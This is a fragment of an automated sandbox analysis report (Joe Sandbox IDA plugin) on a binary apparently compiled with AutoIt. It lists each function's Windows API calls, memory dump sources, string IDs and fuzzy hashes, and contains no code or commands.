                                                                      • Instruction Fuzzy Hash: 271144B9D0020AEFDB51DFA9C4849EEFBF9FF08210F108156E954E3614D735AA558F50
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0102B644
                                                                      • _memset.LIBCMT ref: 0102B653
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,01066F20,01066F64), ref: 0102B682
                                                                      • CloseHandle.KERNEL32 ref: 0102B694
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                      • String ID:
                                                                      • API String ID: 3277943733-0
                                                                      • Opcode ID: db1ca7019ab2bc27b56d5e5734bf80dcdd2025432b7ebb2fbb70ac9c13b6162c
                                                                      • Instruction ID: 8e39ca2223a3c760753a1ede79492782288d192eeea404c32e31761efb1a2caf
                                                                      • Opcode Fuzzy Hash: db1ca7019ab2bc27b56d5e5734bf80dcdd2025432b7ebb2fbb70ac9c13b6162c
                                                                      • Instruction Fuzzy Hash: 1EF082B25403017BF2302B65AC16FBB3A9CEB18395F804020FA89E5196DBBB4C0097A8
                                                                      APIs
                                                                      • EnterCriticalSection.KERNEL32(?), ref: 01006BE6
                                                                        • Part of subcall function 010076C4: _memset.LIBCMT ref: 010076F9
                                                                      • _memmove.LIBCMT ref: 01006C09
                                                                      • _memset.LIBCMT ref: 01006C16
                                                                      • LeaveCriticalSection.KERNEL32(?), ref: 01006C26
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                      • String ID:
                                                                      • API String ID: 48991266-0
                                                                      • Opcode ID: 34c47665eb2da01d08444c15e6e9d2eff14a944577a814a55ecbd777f9ce368a
                                                                      • Instruction ID: 2d4629ed3d6a344022bf07ae58543245c1337d648528c46f04296a0d0bc13239
                                                                      • Opcode Fuzzy Hash: 34c47665eb2da01d08444c15e6e9d2eff14a944577a814a55ecbd777f9ce368a
                                                                      • Instruction Fuzzy Hash: 7AF0543A100101ABCF126F95DC85E8ABB29EF56360F04C055FE499E25ACB35E811DBB4
                                                                      APIs
                                                                        • Part of subcall function 00FA12F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00FA134D
                                                                        • Part of subcall function 00FA12F3: SelectObject.GDI32(?,00000000), ref: 00FA135C
                                                                        • Part of subcall function 00FA12F3: BeginPath.GDI32(?), ref: 00FA1373
                                                                        • Part of subcall function 00FA12F3: SelectObject.GDI32(?,00000000), ref: 00FA139C
                                                                      • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0102BD40
                                                                      • LineTo.GDI32(00000000,?,?), ref: 0102BD4D
                                                                      • EndPath.GDI32(00000000), ref: 0102BD5D
                                                                      • StrokePath.GDI32(00000000), ref: 0102BD6B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                      • String ID:
                                                                      • API String ID: 1539411459-0
                                                                      • Opcode ID: cec0c74a99aa5ab3ef592e11a780cb02e65d6de64edeecd47a240852acb05be1
                                                                      • Instruction ID: 841802188c55f453ebc0130276319a9f9a68f3bcaf3b550fe3cbc5f31240f156
                                                                      • Opcode Fuzzy Hash: cec0c74a99aa5ab3ef592e11a780cb02e65d6de64edeecd47a240852acb05be1
                                                                      • Instruction Fuzzy Hash: 29F0823100126ABBDB326F54AC09FCE3FA9AF06751F244140FA91610D58B7E5561DFA9
                                                                      APIs
                                                                      • GetSysColor.USER32(00000008), ref: 00FA2231
                                                                      • SetTextColor.GDI32(?,000000FF), ref: 00FA223B
                                                                      • SetBkMode.GDI32(?,00000001), ref: 00FA2250
                                                                      • GetStockObject.GDI32(00000005), ref: 00FA2258
                                                                      • GetWindowDC.USER32(?,00000000), ref: 00FDBE83
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 00FDBE90
                                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 00FDBEA9
                                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 00FDBEC2
                                                                      • GetPixel.GDI32(00000000,?,?), ref: 00FDBEE2
                                                                      • ReleaseDC.USER32(?,00000000), ref: 00FDBEED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                      • String ID:
                                                                      • API String ID: 1946975507-0
                                                                      • Opcode ID: 89200bf259765f48eb4c00baeb3a288fb46bf8727a7c5d9680d75a5c8476b40f
                                                                      • Instruction ID: c1467d2467fd6e4925a4ad42400969be147f366ac7ddf285217aae1efc7faa05
                                                                      • Opcode Fuzzy Hash: 89200bf259765f48eb4c00baeb3a288fb46bf8727a7c5d9680d75a5c8476b40f
                                                                      • Instruction Fuzzy Hash: FCE06531504145AADF315F64FC0DBD83F21EB06332F248356FFA9480D587764580EB11
                                                                      APIs
                                                                      • GetCurrentThread.KERNEL32 ref: 00FF871B
                                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,00FF82E6), ref: 00FF8722
                                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00FF82E6), ref: 00FF872F
                                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,00FF82E6), ref: 00FF8736
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentOpenProcessThreadToken
                                                                      • String ID:
                                                                      • API String ID: 3974789173-0
                                                                      • Opcode ID: 392af1ba513fcc66283265d4004134c041b0986baa35855ebc76fb1c23c10077
                                                                      • Instruction ID: 680de140a9d5f22817ae5418eaecc8fe528ad8f9609c45874f50fc2ad59530bf
                                                                      • Opcode Fuzzy Hash: 392af1ba513fcc66283265d4004134c041b0986baa35855ebc76fb1c23c10077
                                                                      • Instruction Fuzzy Hash: 6FE04F36A112129BD7306EB05D4CB563BBCEF557E1F248858F285CA044DA2E84469750
                                                                      APIs
                                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 00FFB4BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ContainedObject
                                                                      • String ID: AutoIt3GUI$Container
                                                                      • API String ID: 3565006973-3941886329
                                                                      • Opcode ID: ccf7b9cd193a11efd7606ce7529f2dfd161514d4ff1c3c563530a90a43938f33
                                                                      • Instruction ID: 27cc84fe38aef31bdf757144812c91dca1a95bdfbec2b467d41d07a0cb0df6ce
                                                                      • Opcode Fuzzy Hash: ccf7b9cd193a11efd7606ce7529f2dfd161514d4ff1c3c563530a90a43938f33
                                                                      • Instruction Fuzzy Hash: 20916975600605AFDB54DF64C884B6ABBF9FF48710F24846DFA4ACB2A1DB70E841DB50
                                                                      APIs
                                                                        • Part of subcall function 00FBFC86: _wcscpy.LIBCMT ref: 00FBFCA9
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • __wcsnicmp.LIBCMT ref: 0100B02D
                                                                      • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0100B0F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                      • String ID: LPT
                                                                      • API String ID: 3222508074-1350329615
                                                                      • Opcode ID: b72685ec33d683c1f5917f945432b21841d5115611974d2f2467d37e30d49286
                                                                      • Instruction ID: 60ebc61668cd9e8464e3d90118c2d80181de915fa012f7a0d1025b200c1b9663
                                                                      • Opcode Fuzzy Hash: b72685ec33d683c1f5917f945432b21841d5115611974d2f2467d37e30d49286
                                                                      • Instruction Fuzzy Hash: 9361B279A00219AFDB15DF98C891EEEB7F4EF09310F4440A9F956AB291DB74AE40CB50
                                                                      APIs
                                                                      • Sleep.KERNEL32(00000000), ref: 00FB2968
                                                                      • GlobalMemoryStatusEx.KERNEL32(?), ref: 00FB2981
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemorySleepStatus
                                                                      • String ID: @
                                                                      • API String ID: 2783356886-2766056989
                                                                      • Opcode ID: 89a5f36fd64f02a1e3746cde7bb4cd0c8887fa5815d4261d0287c706eb5d85fd
                                                                      • Instruction ID: c7486becd3cddd189587034ea2304d3334b4d16b760bd03825a020b1c3ba0e1c
                                                                      • Opcode Fuzzy Hash: 89a5f36fd64f02a1e3746cde7bb4cd0c8887fa5815d4261d0287c706eb5d85fd
                                                                      • Instruction Fuzzy Hash: 53516CB1408744ABE320EF50DC85BAFB7E8FF86344F81885DF2D841095DBB98929DB56
                                                                      APIs
                                                                        • Part of subcall function 00FA4F0B: __fread_nolock.LIBCMT ref: 00FA4F29
                                                                      • _wcscmp.LIBCMT ref: 01009824
                                                                      • _wcscmp.LIBCMT ref: 01009837
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscmp$__fread_nolock
                                                                      • String ID: FILE
                                                                      • API String ID: 4029003684-3121273764
                                                                      • Opcode ID: 8385f9319e0a51883b095e72433cc4fc076e8c9837522032abc7766b085a65ab
                                                                      • Instruction ID: 469c8a53b0b2569999169cc8a9c9fd6ead3833444196e26bc3e9f5ada9eea702
                                                                      • Opcode Fuzzy Hash: 8385f9319e0a51883b095e72433cc4fc076e8c9837522032abc7766b085a65ab
                                                                      • Instruction Fuzzy Hash: AF41D971A0020ABAEF219BA4CC45FEFBBFDDFC5714F004469F944A7181DAB5AA049B61
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0101259E
                                                                      • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 010125D4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: CrackInternet_memset
                                                                      • String ID: |
                                                                      • API String ID: 1413715105-2343686810
                                                                      • Opcode ID: 8f73c9dd753575b712b128838f2fb097ea84c7514286f677b9d45c4d61114e44
                                                                      • Instruction ID: 1c92e561d99f61328909c6c3822aab330e192ffc5e314307787479650630e1e2
                                                                      • Opcode Fuzzy Hash: 8f73c9dd753575b712b128838f2fb097ea84c7514286f677b9d45c4d61114e44
                                                                      • Instruction Fuzzy Hash: DA3146B1800209EBCF01EFA5CC85EEEBFB8FF09340F100059F915A6166EB395A56DB60
                                                                      APIs
                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 01027B61
                                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01027B76
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: '
                                                                      • API String ID: 3850602802-1997036262
                                                                      • Opcode ID: ac7810f7dd0c2a6f07b1650bf261167a51bad45a2b30906791e51fae1c6e2a1e
                                                                      • Instruction ID: 40f1170545f142ddace434d851e3fbc2c0b8abd5ce745f0516df758a17f186c7
                                                                      • Opcode Fuzzy Hash: ac7810f7dd0c2a6f07b1650bf261167a51bad45a2b30906791e51fae1c6e2a1e
                                                                      • Instruction Fuzzy Hash: 25413B74A0121A9FDB54CFA8C880BDABBF5FF48310F1001AAEA44AB341D731A951CF90
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?,?), ref: 01026B17
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 01026B53
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$DestroyMove
                                                                      • String ID: static
                                                                      • API String ID: 2139405536-2160076837
                                                                      • Opcode ID: 63cf73f1937ae9ad7720d0c3276c866ef0b87ab0071b982ba06fc0b41cd7a2ea
                                                                      • Instruction ID: 6158dc4b38ea7c7f36cb294698072d9f99e5537802d4bf84fe837ea5f9da1b2b
                                                                      • Opcode Fuzzy Hash: 63cf73f1937ae9ad7720d0c3276c866ef0b87ab0071b982ba06fc0b41cd7a2ea
                                                                      • Instruction Fuzzy Hash: A6319E71200214AEEB119F69CC80BFB77F9FF49760F108619F9E997190DA36AC91DB60
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 01002911
                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0100294C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: InfoItemMenu_memset
                                                                      • String ID: 0
                                                                      • API String ID: 2223754486-4108050209
                                                                      • Opcode ID: d41314196090f143dfc98da1d5c6385394a201d22ba6cad01d79c9b9734e7449
                                                                      • Instruction ID: f6f6bbd1eda1ec4ff7f0d2dd513dbd7ea86fdaa43870dbb687a65a3eb649b1bf
                                                                      • Opcode Fuzzy Hash: d41314196090f143dfc98da1d5c6385394a201d22ba6cad01d79c9b9734e7449
                                                                      • Instruction Fuzzy Hash: 3C3191316003069BFB66CE9CCD89BAEBFF8EF45390F140099EAC5A61E1DB709544CB52
                                                                      APIs
                                                                      • __snwprintf.LIBCMT ref: 01013A66
                                                                        • Part of subcall function 00FA7DE1: _memmove.LIBCMT ref: 00FA7E22
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __snwprintf_memmove
                                                                      • String ID: , $$AUTOITCALLVARIABLE%d
                                                                      • API String ID: 3506404897-2584243854
                                                                      • Opcode ID: 0b320eb116ff75475d3cb98d22c0be03c68854e9113de04140aab9dfd4a80f39
                                                                      • Instruction ID: 1efe95262c9f05985eac74e6ca866801c70ec09e0b884fd7692ccee9bd9f9f82
                                                                      • Opcode Fuzzy Hash: 0b320eb116ff75475d3cb98d22c0be03c68854e9113de04140aab9dfd4a80f39
                                                                      • Instruction Fuzzy Hash: 3E21E471A00219AFCF10EF65CC82EAE7BB9BF45720F804459F945AF142DB38E941DB61
                                                                      APIs
                                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 01026761
                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0102676C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend
                                                                      • String ID: Combobox
                                                                      • API String ID: 3850602802-2096851135
                                                                      • Opcode ID: edce9ab0afd3449365d242d624f660dd32823e28af07eaf185aedaefa941b3c8
                                                                      • Instruction ID: 42c2f03f13e41523d80608a7d3c5d037512773537a7ea9688c26c5e5dc9a3317
                                                                      • Opcode Fuzzy Hash: edce9ab0afd3449365d242d624f660dd32823e28af07eaf185aedaefa941b3c8
                                                                      • Instruction Fuzzy Hash: CA11E975200119AFEF618E18DC84EBB37AAFB49394F100125FD9497291E636DC5087A0
                                                                      APIs
                                                                        • Part of subcall function 00FA1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FA1D73
                                                                        • Part of subcall function 00FA1D35: GetStockObject.GDI32(00000011), ref: 00FA1D87
                                                                        • Part of subcall function 00FA1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FA1D91
                                                                      • GetWindowRect.USER32(00000000,?), ref: 01026C71
                                                                      • GetSysColor.USER32(00000012), ref: 01026C8B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                      • String ID: static
                                                                      • API String ID: 1983116058-2160076837
                                                                      • Opcode ID: 53c9b464fe1d9c42e2985bd6b18c32e78838475cfb96c3b829d9aec3175e71c1
                                                                      • Instruction ID: ce7431ca93015295eaa23fa71ca943cfd34fdda80ce088d85b4fc12019afe58e
                                                                      • Opcode Fuzzy Hash: 53c9b464fe1d9c42e2985bd6b18c32e78838475cfb96c3b829d9aec3175e71c1
                                                                      • Instruction Fuzzy Hash: A9211472A1021AAFDB15DFA8C845AFA7BB8FB08354F104629FD95D3240D63AE8509B60
                                                                      APIs
                                                                      • GetWindowTextLengthW.USER32(00000000), ref: 010269A2
                                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 010269B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: LengthMessageSendTextWindow
                                                                      • String ID: edit
                                                                      • API String ID: 2978978980-2167791130
                                                                      • Opcode ID: 6cc8cb513df570de8bf8471e9db9d2f3463e0eabe80a2e1ba75b6dc2afe7bf9b
                                                                      • Instruction ID: f8da35558eda9242706d2528760d09ee4ec7a930f3e988e33c0f018abfc7f227
                                                                      • Opcode Fuzzy Hash: 6cc8cb513df570de8bf8471e9db9d2f3463e0eabe80a2e1ba75b6dc2afe7bf9b
                                                                      • Instruction Fuzzy Hash: FE116A71600229ABEB618E68DC44EEB3BADEB053B4F504754FEE1961D0CA36DC519BA0
                                                                      APIs
